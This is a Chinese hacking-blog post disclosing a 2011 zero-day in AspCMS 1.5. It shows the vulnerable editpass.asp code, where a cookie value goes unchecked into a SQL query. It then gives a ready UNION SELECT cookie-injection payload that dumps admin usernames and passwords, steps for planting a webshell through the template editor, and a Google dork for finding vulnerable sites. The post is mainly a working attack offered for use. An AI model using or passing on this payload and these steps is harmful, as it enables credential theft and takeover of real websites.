Aspcms 稳定版1.5 0day - 漏洞分析,aspcms,admin,学习|渗透|注射|备忘|资料|收集|网文|入侵|注入|工作室|久久久电脑工作室|久久久|st999|电脑|电脑工作室|久久久电脑| - Powered by Sablog-X

Aspcms 稳定版1.5 0day

2011, December 3, 1:45 PM. 漏洞分析

Submitted by admin

Author: Virushack

Blog: http://virushack.org

From:www.v5script.org

漏洞文件：editpass.asp

漏洞代码：

Dim linkman , gender , phone , mobile , email , qq , address , postcode
if isnul ( rCookie ( “loginstatus” )) then wCookie “loginstatus” , 0
if rCookie ( “loginstatus” )= 1 then
set rsObj = conn . Exec ( “select * from aspcms_Users where UserID=” & trim ( rCookie ( “userID” )), “r1″ )
直接通过rCookie 取得userid带入查询.

再看看 rcookie函数的处理

‘读cookies
Function rCookie(cookieName)
rCookie=request.cookies(cookieName)
End Function

直接通过cookies取得

利用：
注册个帐号让 loginstatus不为空
然后 cookies注入 userID 不管你手注还是工具都行我这是用火狐的cookies插件

Exploit：UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
效果图：

后台拿shell 就更简单了插一句话什么都行我这就用最稳当的方法

http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp

http://127.0.0.1/Templates/default/html/a.asp

Google Dork: Powered by AspCms v1.5

Tags: aspcms

« 上一篇 | 下一篇 »

只显示10条记录相关文章

aspcms2.1.4 GBK版注入漏洞 (浏览: 16499, 评论: 0)
aspcms企业建站系统0day 2.0以上通杀 (浏览: 21509, 评论: 0)

Trackbacks

发表评论

注册 | 登陆

网名：流浪的风，QQ：470032103，安全交流群：36799078;本博客为个人笔记之地，不喜勿入；有类似helen心理的，请勿加群！

日志分类

热门标签

discuz [23]
dedecms [20]
oday [18]
ecshop [18]
phpcms [15]
上传 [13]
网趣 [11]
dede [9]
注入 [8]
shopxp [7]
shopex [7]
无忧 [6]
ewebeditor [6]
dvbbs [6]
mssql [6]

搜索文章

最新评论

博客信息

分类数量: 18
文章数量: 468
评论数量: 7
标签数量: 254
附件数量: 492
引用数量: 0
注册用户: 1
今日访问: 211
总访问量: 3744051
程序版本: 1.6

51.la

{title}